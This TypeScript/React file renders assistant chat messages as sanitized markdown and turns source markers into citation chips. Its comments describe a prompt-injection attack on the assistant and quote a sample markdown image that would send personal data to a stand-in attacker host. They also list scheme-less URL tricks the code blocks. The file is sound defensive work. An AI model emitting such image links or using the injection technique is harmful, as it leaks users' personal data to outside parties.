/**
 * Sanitized markdown renderer for assistant chat messages.
 *
 * WHY THIS EXISTS (chat-parity gap): the legacy chat UI rendered assistant text
 * as raw markdown using CDN `marked` + `DOMPurify` loaded via inline <script>
 * tags. Inline scripts are banned by this SPA's strict CSP (no-inline-scripts),
 * so the first cut of the SPA fell back to `whitespace-pre-wrap`, which shows
 * literal `**bold**`, `- bullets`, code fences, links, etc. as plain text.
 *
 * This component restores markdown rendering with a fully BUNDLER-FRIENDLY,
 * CSP-safe stack — no CDN, no inline scripts, no `dangerouslySetInnerHTML`:
 *
 *   react-markdown   — parses markdown into a React element tree (no innerHTML)
 *   remark-gfm       — GitHub-Flavored Markdown (tables, strikethrough, task
 *                      lists, autolinks) to match what the model emits
 *   rehype-highlight — server-of-record-free syntax highlighting: tokenizes
 *                      fenced code blocks into <span class="hljs-…"> nodes at the
 *                      HAST stage. Colours come from a BUNDLED highlight.js theme
 *                      stylesheet (imported below), NOT inline styles, so the
 *                      strict `style-src 'self'` CSP is satisfied.
 *   rehype-sanitize  — sanitizes the HAST against an EXTENDED GitHub schema so a
 *                      malicious/poisoned assistant message can't inject script,
 *                      event handlers, javascript: URLs, etc. This is the
 *                      DOMPurify equivalent, applied as part of the bundle.
 *
 * Rendering pipeline order matters: remark-gfm runs at the markdown (mdast)
 * stage; rehype-highlight then rehype-sanitize run at the HTML (hast) stage.
 * highlight MUST run BEFORE sanitize so the sanitizer sees (and vets) the
 * highlighted output — never the reverse, or a tampered className could slip
 * through unsanitized.
 *
 * Defense in depth: even though /api/chat/send scrubs PII and the content comes
 * from our own backend, we never trust message content to be safe HTML. The
 * sanitizer is the boundary. We widen the default schema by exactly ONE thing:
 * `className` on `code`/`span`/`pre` (so the hljs token classes survive). No new
 * tags, no new URL protocols, no event handlers.
 *
 * We also NARROW it (2026-10-11, zero-click PII exfiltration): model output is
 * attacker-influenceable (prompt injection via web search / RAG / waiver text),
 * and the server detokenizes PII into it. So no auto-fetching elements
 * (`img`/`picture`/`source`), link `href` limited to http/https/mailto, and a
 * `urlTransform` that also drops scheme-less URLs pointing at another origin
 * (`//host`, `\\host`). The server half — tokens inside URLs are never
 * detokenized — is in apps/experts/lib/pii-scrubber.js (findUrlSpans).
 */
import { CheckIcon, CopyIcon, WarningIcon } from '@phosphor-icons/react';
import {
  createContext,
  Fragment,
  useContext,
  useState,
  type ReactNode,
} from 'react';
import type { ComponentPropsWithoutRef } from 'react';
import ReactMarkdown, { type ExtraProps } from 'react-markdown';
import rehypeHighlight from 'rehype-highlight';
import rehypeSanitize, { defaultSchema } from 'rehype-sanitize';
import remarkGfm from 'remark-gfm';
import type { Element as HastElement } from 'hast';
import type { Citation } from '@/features/chat/api-types';
// Bundled highlight.js theme (CSP-safe: shipped in the app bundle, not a CDN or
// inline <style>). github-dark reads well on the Nomad bg-surface-background.
import 'highlight.js/styles/github-dark.css';

type MarkdownProps = {
  children: string;
  /**
   * Structured inline source citations for this assistant turn (task #178). The
   * model's in-text markers ([per knowledge/<file>], [ATPCO Cat N],
   * [Sabre TI: …]) are replaced with clickable numbered chips ([1], [2], …) that
   * map to this array; clicking opens a popover with the source title + snippet +
   * a KB link. Absent / empty → text renders unchanged.
   */
  citations?: Citation[];
  /**
   * True when the model flagged it had no authoritative source. The
   * `[no authoritative source — flag for senior agent]` marker is replaced with a
   * distinct warning chip (NOT a citation) so the advisor knows to escalate.
   */
  hasUnsourcedClaim?: boolean;
};

/**
 * Elements that make the browser FETCH a URL on render, with no click. Model
 * output must never produce one: a prompt-injected
 * `![x](https://attacker.example/?q=<PII>)` was a zero-click PII exfiltration
 * path (Codex review, 2026-10-11). The default GitHub schema allows `img`,
 * `picture` and `source` (`srcSet`); none is used by any assistant feature —
 * chat attachments render through AttachmentPreviews, not this component.
 */
const AUTO_FETCHING_TAGS = new Set(['img', 'picture', 'source']);

/**
 * Schema = GitHub's default, with ONE widening and two narrowings:
 *
 * - widened: `className` allowed on `code`/`span`/`pre`, the MINIMAL change
 *   needed for highlight.js token spans to survive sanitization (the default
 *   already allows `className: /^language-./` on `code`).
 * - narrowed: no auto-fetching elements (`img`/`picture`/`source`, see above).
 * - narrowed: link `href` protocols are http/https/mailto only (the default
 *   also allows irc/ircs/xmpp, which nothing in chat needs).
 *
 * Everything else (event handlers, `script`, the rest of the lockdown) stays at
 * the default.
 */
const codeHighlightSchema = {
  ...defaultSchema,
  tagNames: (defaultSchema.tagNames ?? []).filter(
    (t) => !AUTO_FETCHING_TAGS.has(t),
  ),
  attributes: {
    ...defaultSchema.attributes,
    code: [
      ...(defaultSchema.attributes?.code ?? []),
      ['className', /^language-./, /^hljs/],
    ],
    span: [...(defaultSchema.attributes?.span ?? []), ['className', /^hljs/]],
    pre: [...(defaultSchema.attributes?.pre ?? []), ['className', /^hljs/]],
  },
  protocols: {
    ...defaultSchema.protocols,
    href: ['http', 'https', 'mailto'],
  },
};

/**
 * URL gate applied by react-markdown to every URL-bearing property. The
 * sanitizer's protocol list treats any URL without a scheme as "relative" and
 * lets it through — including `//attacker.example`, `\\attacker.example` and
 * `/\attacker.example`, which browsers resolve to ANOTHER origin. So:
 *
 * - `http:`, `https:`, `mailto:` → kept;
 * - any other scheme → dropped;
 * - scheme-less → kept only when it is unambiguously same-origin (`/path`,
 *   `#frag`, `?q`, `path`), i.e. it does not start with two slashes of either
 *   kind once the tab/newline/control characters browsers ignore are removed.
 *
 * Returning `undefined` drops the attribute, so a rejected link renders as
 * plain text rather than a clickable anchor.
 */
export function safeUrlTransform(url: string): string | undefined {
  // Browsers strip leading/trailing C0 controls + spaces and remove tab/CR/LF
  // anywhere, so `/\t/evil.example` navigates like `//evil.example`. Judge the
  // URL the way the browser will read it.
  const normalized = url.replace(/[\u0000- ]/g, '');
  if (normalized === '') return undefined;
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(normalized);
  if (scheme) {
    return ['http', 'https', 'mailto'].includes(scheme[1].toLowerCase())
      ? url
      : undefined;
  }
  // A colon before the first / ? # would make it a scheme the regex above did
  // not recognise (e.g. leading garbage) — refuse rather than guess.
  const firstDelim = normalized.search(/[/?#]/);
  const colon = normalized.indexOf(':');
  if (colon !== -1 && (firstDelim === -1 || colon < firstDelim)) {
    return undefined;
  }
  if (/^[/\\]{2}/.test(normalized)) return undefined;
  return url;
}

/** Recursively extract the raw text content of a hast node (the code text). */
function hastText(node: HastElement | undefined): string {
  if (!node) return '';
  let out = '';
  for (const child of node.children ?? []) {
    if (child.type === 'text') out += child.value;
    else if (child.type === 'element') out += hastText(child);
  }
  return out;
}

/**
 * A fenced code block with a copy-to-clipboard affordance in the top-right
 * corner. Copies ONLY this block's text (read from the hast node, so the copied
 * text is the un-highlighted source — no token markup). Mirrors the
 * MessageActions copy pattern: optimistic "Copied" flip, silent on insecure
 * contexts where `navigator.clipboard` is unavailable.
 */
function CodeBlock({
  node,
  children,
  ...rest
}: ComponentPropsWithoutRef<'pre'> & ExtraProps) {
  const [copied, setCopied] = useState(false);
  const text = hastText(node);

  const copy = async () => {
    try {
      await navigator.clipboard.writeText(text);
      setCopied(true);
      setTimeout(() => setCopied(false), 1500);
    } catch {
      /* clipboard unavailable (insecure context) — silent, matches legacy */
    }
  };

  return (
    <div className="group relative mb-2 last:mb-0">
      <button
        aria-label="Copy code"
        // data-testid="code-copy-button" — the per-code-block copy affordance the
        // e2e chat spec clicks (selectors.ts codeCopyButton). One per fenced
        // block; reads only that block's source text.
        data-testid="code-copy-button"
        className="absolute top-2 right-2 flex items-center gap-1 rounded-md border border-border-subtle bg-surface-foreground px-2 py-1 text-content-secondary text-xs opacity-0 transition-opacity hover:text-content-primary focus:opacity-100 group-hover:opacity-100"
        onClick={() => {
          void copy();
        }}
        type="button"
      >
        {copied ? (
          <CheckIcon className="size-icon-sm" />
        ) : (
          <CopyIcon className="size-icon-sm" />
        )}
        <span>{copied ? 'Copied' : 'Copy'}</span>
      </button>
      <pre
        className="overflow-x-auto rounded-md border border-border-subtle bg-surface-background p-3"
        {...rest}
      >
        {children}
      </pre>
    </div>
  );
}

// ── Inline source citations (task #178) ─────────────────────────────────────
//
// The model emits in-text citation markers. We replace each marker, INSIDE the
// rendered text nodes (post-sanitize, so the chips are our own trusted React —
// never injected HTML), with a clickable chip:
//   [per knowledge/<file>]  [ATPCO Cat N]  [Sabre TI: …]  → numbered source chip
//   [no authoritative source — flag for senior agent]     → warning chip
//
// The chip → citation mapping is positional: the Nth distinct cited source in
// the citations array is chip [N]. We resolve a marker to a citation by matching
// the marker's source identity (file basename / "ATPCO Cat N" / "Sabre TI: …")
// against the citations array the backend already built from RETRIEVED chunks.
// A marker with no matching citation (e.g. an unbacked knowledge ref the backend
// dropped) renders as plain bracket text — never a fake chip.

// Combined matcher: one regex, alternation across the four marker kinds, so a
// single split pass over a text node finds every marker in order. Mirrors the
// CITATION RULE markers in apps/experts/api/chat/send.js + lib/citations.js.
const CITATION_MARKER_RE =
  /\[per\s+knowledge\/[^\]]+?\]|\[ATPCO\s+Cat\s+[^\]]+?\]|\[Sabre\s+TI:\s*[^\]]+?\]|\[no\s+authoritative\s+source\s*[—-]\s*flag\s+for\s+senior\s+agent\]/gi;

const NO_SOURCE_MARKER_RE =
  /^\[no\s+authoritative\s+source\s*[—-]\s*flag\s+for\s+senior\s+agent\]$/i;

function normaliseKnowledgeRef(ref: string): string {
  return ref
    .trim()
    .replace(/^knowledge\//i, '')
    .replace(/^\/+/, '')
    .toLowerCase();
}

/** Resolve a matched in-text marker to its citation in the array, or null. */
function resolveMarker(marker: string, citations: Citation[]): Citation | null {
  const knowledge = marker.match(/^\[per\s+knowledge\/([^\]]+?)\]$/i);
  if (knowledge) {
    const ref = normaliseKnowledgeRef(knowledge[1]);
    return (
      citations.find(
        (c) => c.kbSlug && normaliseKnowledgeRef(c.kbSlug) === ref,
      ) ??
      citations.find((c) => normaliseKnowledgeRef(c.source) === ref) ??
      null
    );
  }
  const atpco = marker.match(/^\[ATPCO\s+Cat\s+([^\]]+?)\]$/i);
  if (atpco) {
    // Match on the FULL label (case/space-insensitive) so `Cat 31 paragraph 3`
    // and `paragraph 5` resolve to their OWN citation, not a number-only collapse.
    const label = atpco[1].trim().toLowerCase().replace(/\s+/g, ' ');
    return (
      citations.find(
        (c) =>
          (c.atpcoCat ?? '').trim().toLowerCase().replace(/\s+/g, ' ') ===
          label,
      ) ?? null
    );
  }
  const sabre = marker.match(/^\[Sabre\s+TI:\s*([^\]]+?)\]$/i);
  if (sabre) {
    const entry = sabre[1].trim().toLowerCase();
    return (
      citations.find((c) => (c.sabreTI ?? '').trim().toLowerCase() === entry) ??
      null
    );
  }
  return null;
}

/** Context carrying the resolved citations down to the text renderer. */
const CitationContext = createContext<{
  citations: Citation[];
  indexById: Map<string, number>;
}>({ citations: [], indexById: new Map() });

/**
 * A clickable inline citation chip ([1], [2], …). Clicking toggles a popover
 * showing the source title, a sanitized snippet, and a KB deep-link. CSP-safe:
 * pure React, no inline scripts/styles, link uses noopener/noreferrer.
 */
function CitationChip({
  index,
  citation,
}: {
  index: number;
  citation: Citation;
}) {
  const [open, setOpen] = useState(false);
  // An UNVERIFIED ref (model-claimed ATPCO/Sabre standard with no retrieved chunk
  // backing it) is styled distinctly and never carries a deep-link — it must not
  // read as a clickable trusted source (codex review 2026-06-20).
  const isVerified = citation.verified !== false;
  return (
    <span className="relative inline-block align-baseline">
      <button
        type="button"
        // data-testid="citation-chip" — the inline source chip the e2e chat
        // journey clicks (selectors.ts citationChips). One per cited source.
        data-testid="citation-chip"
        data-citation-id={citation.id}
        data-citation-verified={isVerified ? 'true' : 'false'}
        aria-label={`${isVerified ? 'Source' : 'Unverified source'} ${index}: ${citation.title}`}
        aria-expanded={open}
        onClick={() => setOpen((v) => !v)}
        className={
          isVerified
            ? 'mx-0.5 inline-flex h-4 min-w-4 items-center justify-center rounded-sm border border-border-subtle bg-surface-background px-1 align-super font-mono text-[0.65rem] text-content-action-light leading-none hover:bg-surface-foreground focus:outline-none focus:ring-1 focus:ring-content-action-light'
            : 'mx-0.5 inline-flex h-4 min-w-4 items-center justify-center rounded-sm border border-content-warning border-dashed bg-surface-background px-1 align-super font-mono text-[0.65rem] text-content-warning leading-none hover:bg-surface-foreground focus:outline-none focus:ring-1 focus:ring-content-warning'
        }
      >
        {index}
      </button>
      {open && (
        <span
          // data-testid="citation-popover" — the opened source view.
          data-testid="citation-popover"
          role="dialog"
          className="absolute bottom-full left-0 z-10 mb-1 block w-72 rounded-md border border-border-subtle bg-surface-foreground p-3 text-left shadow-lg"
        >
          <span className="mb-1 block font-inter font-semibold text-content-primary text-xs">
            {citation.title}
          </span>
          {!isVerified && (
            <span className="mb-2 flex items-center gap-1 font-inter text-content-warning text-xs">
              <WarningIcon className="size-3" weight="fill" />
              Unverified — not found in the knowledge base. Confirm before
              relying on it.
            </span>
          )}
          {citation.snippet && (
            <span className="mb-2 block font-inter text-content-secondary text-xs">
              {citation.snippet}
            </span>
          )}
          {isVerified && citation.kbSlug ? (
            <a
              className="font-inter text-content-action-light text-xs underline underline-offset-2"
              href={`/knowledge/${citation.kbSlug}`}
              rel="noopener noreferrer"
              target="_blank"
            >
              {citation.source}
            </a>
          ) : (
            <span className="font-inter text-content-secondary text-xs">
              {citation.source}
            </span>
          )}
        </span>
      )}
    </span>
  );
}

/** A distinct warning chip for the no-authoritative-source escalation marker. */
function NoSourceChip() {
  return (
    <span
      // data-testid="citation-no-source" — the senior-agent escalation warning.
      data-testid="citation-no-source"
      role="note"
      className="mx-0.5 inline-flex items-center gap-1 rounded-sm border border-content-warning bg-surface-background px-1.5 py-0.5 align-baseline font-inter text-content-warning text-xs"
    >
      <WarningIcon className="size-3" weight="fill" />
      no authoritative source — flag for senior agent
    </span>
  );
}

/**
 * An unresolved `[per knowledge/<file>]` marker: the model cited a file the
 * backend did NOT retrieve, so it was dropped from the citations array. Rather
 * than leave raw bracket syntax in the answer (which reads like a broken
 * reference), render a neutral "unverified" affordance — never a clickable
 * source (codex review 2026-06-20).
 */
function UnresolvedMarkerChip({ label }: { label: string }) {
  return (
    <span
      // data-testid="citation-unverified" — a claimed-but-unretrieved source.
      data-testid="citation-unverified"
      role="note"
      title="The assistant cited a source that was not found in the knowledge base."
      className="mx-0.5 inline-flex items-center gap-1 rounded-sm border border-content-warning border-dashed bg-surface-background px-1 align-baseline font-inter text-content-warning text-xs"
    >
      <WarningIcon className="size-3" weight="fill" />
      {label}
    </span>
  );
}

/**
 * Transform a plain-text node into a fragment where every recognised citation
 * marker is replaced with a chip. Non-string children (already-rendered React
 * elements such as <strong>, <code>) pass through untouched — markers only ever
 * appear in raw text. Returns the children unchanged when no marker matches, so
 * the common (no-citation) path is allocation-free.
 */
function withCitationChips(
  children: ReactNode,
  citations: Citation[],
  indexById: Map<string, number>,
): ReactNode {
  const mapText = (text: string, keyBase: string): ReactNode => {
    CITATION_MARKER_RE.lastIndex = 0;
    if (!CITATION_MARKER_RE.test(text)) return text;
    CITATION_MARKER_RE.lastIndex = 0;
    const parts: ReactNode[] = [];
    let last = 0;
    let n = 0;
    for (const m of text.matchAll(CITATION_MARKER_RE)) {
      const marker = m[0];
      const start = m.index ?? 0;
      if (start > last) parts.push(text.slice(last, start));
      if (NO_SOURCE_MARKER_RE.test(marker)) {
        parts.push(<NoSourceChip key={`${keyBase}-ns-${n}`} />);
      } else {
        const cit = resolveMarker(marker, citations);
        if (cit) {
          parts.push(
            <CitationChip
              key={`${keyBase}-c-${n}`}
              index={indexById.get(cit.id) ?? Number(cit.id)}
              citation={cit}
            />,
          );
        } else {
          // The backend dropped this marker (a [per knowledge/<file>] the model
          // claimed but retrieval never surfaced). Render a neutral "unverified"
          // affordance — NOT raw bracket syntax, and never a clickable source.
          const file = marker.match(/^\[per\s+knowledge\/([^\]]+?)\]$/i)?.[1];
          parts.push(
            <UnresolvedMarkerChip
              key={`${keyBase}-u-${n}`}
              label={file ? `unverified: ${file}` : 'unverified source'}
            />,
          );
        }
      }
      last = start + marker.length;
      n += 1;
    }
    if (last < text.length) parts.push(text.slice(last));
    return <Fragment key={keyBase}>{parts}</Fragment>;
  };

  const walk = (node: ReactNode, key: string): ReactNode => {
    if (typeof node === 'string') return mapText(node, key);
    if (Array.isArray(node)) {
      return node.map((child, i) => (
        <Fragment key={`${key}-${i}`}>{walk(child, `${key}-${i}`)}</Fragment>
      ));
    }
    return node;
  };

  return walk(children, 'cit');
}

/** Renders children with citation chips substituted in (reads the context). */
function Citationize({ children }: { children: ReactNode }) {
  const { citations, indexById } = useContext(CitationContext);
  return <>{withCitationChips(children, citations, indexById)}</>;
}

/**
 * Renders a markdown string as sanitized React elements. Links open in a new
 * tab with `rel="noopener noreferrer"` so a rendered link can't reach back into
 * the opener (tabnabbing) — `target`/`rel` survive the sanitizer's default
 * schema. Styling is handled by the parent's prose/typography classes plus the
 * small per-element classes below so output matches the Nomad chat bubble.
 */
export function Markdown({
  children,
  citations = [],
  hasUnsourcedClaim = false,
}: MarkdownProps) {
  // Stable [N] numbering: the Nth citation in the array is chip N.
  const indexById = new Map<string, number>();
  citations.forEach((c, i) => indexById.set(c.id, i + 1));
  const hasCitationAffordance = citations.length > 0 || hasUnsourcedClaim;

  // When there are no markers to render, `C` is the identity wrapper so the
  // common (no-citation) render path is unchanged. Otherwise it substitutes
  // citation chips into the text children of each text-bearing element.
  const C = ({ children }: { children: ReactNode }): ReactNode =>
    hasCitationAffordance ? <Citationize>{children}</Citationize> : children;

  const tree = (
    <ReactMarkdown
      // Same-origin / http(s) / mailto only — see safeUrlTransform. The
      // sanitizer's protocol list is the second gate for the same rule.
      urlTransform={safeUrlTransform}
      remarkPlugins={[remarkGfm]}
      // highlight BEFORE sanitize (see file docstring): sanitize is always the
      // final gate over whatever highlight produced.
      rehypePlugins={[
        [rehypeHighlight, { detect: true, ignoreMissing: true }],
        [rehypeSanitize, codeHighlightSchema],
      ]}
      components={{
        // Tighten spacing so multi-paragraph answers read as one bubble.
        p: ({ children }) => (
          <p className="mb-2 last:mb-0">
            <C>{children}</C>
          </p>
        ),
        ul: ({ children }) => (
          <ul className="mb-2 list-disc pl-5 last:mb-0">{children}</ul>
        ),
        ol: ({ children }) => (
          <ol className="mb-2 list-decimal pl-5 last:mb-0">{children}</ol>
        ),
        li: ({ children }) => (
          <li className="mb-0.5">
            <C>{children}</C>
          </li>
        ),
        a: ({ children, href }) => (
          <a
            className="text-content-action-light underline underline-offset-2"
            href={href}
            // noopener: no window.opener (reverse tabnabbing). noreferrer: the
            // destination does not learn which chat page linked to it.
            // nofollow: a model-emitted link is not an endorsement.
            rel="noopener noreferrer nofollow"
            target="_blank"
          >
            {children}
          </a>
        ),
        code: ({ className, children }) => {
          // Inline code (no language class) vs. fenced block (has it).
          const isBlock = /language-|hljs/.test(className ?? '');
          if (isBlock) {
            // Block <code> keeps its hljs classes for highlight colouring; the
            // copy affordance + border live on the wrapping <pre> (CodeBlock).
            return (
              <code className={`font-mono text-xs ${className ?? ''}`}>
                {children}
              </code>
            );
          }
          return (
            <code className="rounded bg-surface-background px-1 py-0.5 font-mono text-xs">
              {children}
            </code>
          );
        },
        // The fenced-block wrapper: border + bg + per-block copy button.
        pre: CodeBlock,
        h1: ({ children }) => (
          <h1 className="mb-1 font-semibold text-base">
            <C>{children}</C>
          </h1>
        ),
        h2: ({ children }) => (
          <h2 className="mb-1 font-semibold text-sm">
            <C>{children}</C>
          </h2>
        ),
        h3: ({ children }) => (
          <h3 className="mb-1 font-semibold text-sm">
            <C>{children}</C>
          </h3>
        ),
        blockquote: ({ children }) => (
          <blockquote className="mb-2 border-border-subtle border-l-2 pl-3 text-content-secondary last:mb-0">
            <C>{children}</C>
          </blockquote>
        ),
        table: ({ children }) => (
          <div className="mb-2 overflow-x-auto last:mb-0">
            <table className="w-full border-collapse text-xs">{children}</table>
          </div>
        ),
        th: ({ children }) => (
          <th className="border border-border-subtle px-2 py-1 text-left font-semibold">
            <C>{children}</C>
          </th>
        ),
        td: ({ children }) => (
          <td className="border border-border-subtle px-2 py-1">
            <C>{children}</C>
          </td>
        ),
      }}
    >
      {children}
    </ReactMarkdown>
  );

  if (!hasCitationAffordance) return tree;

  return (
    <CitationContext.Provider value={{ citations, indexById }}>
      {tree}
    </CitationContext.Provider>
  );
}
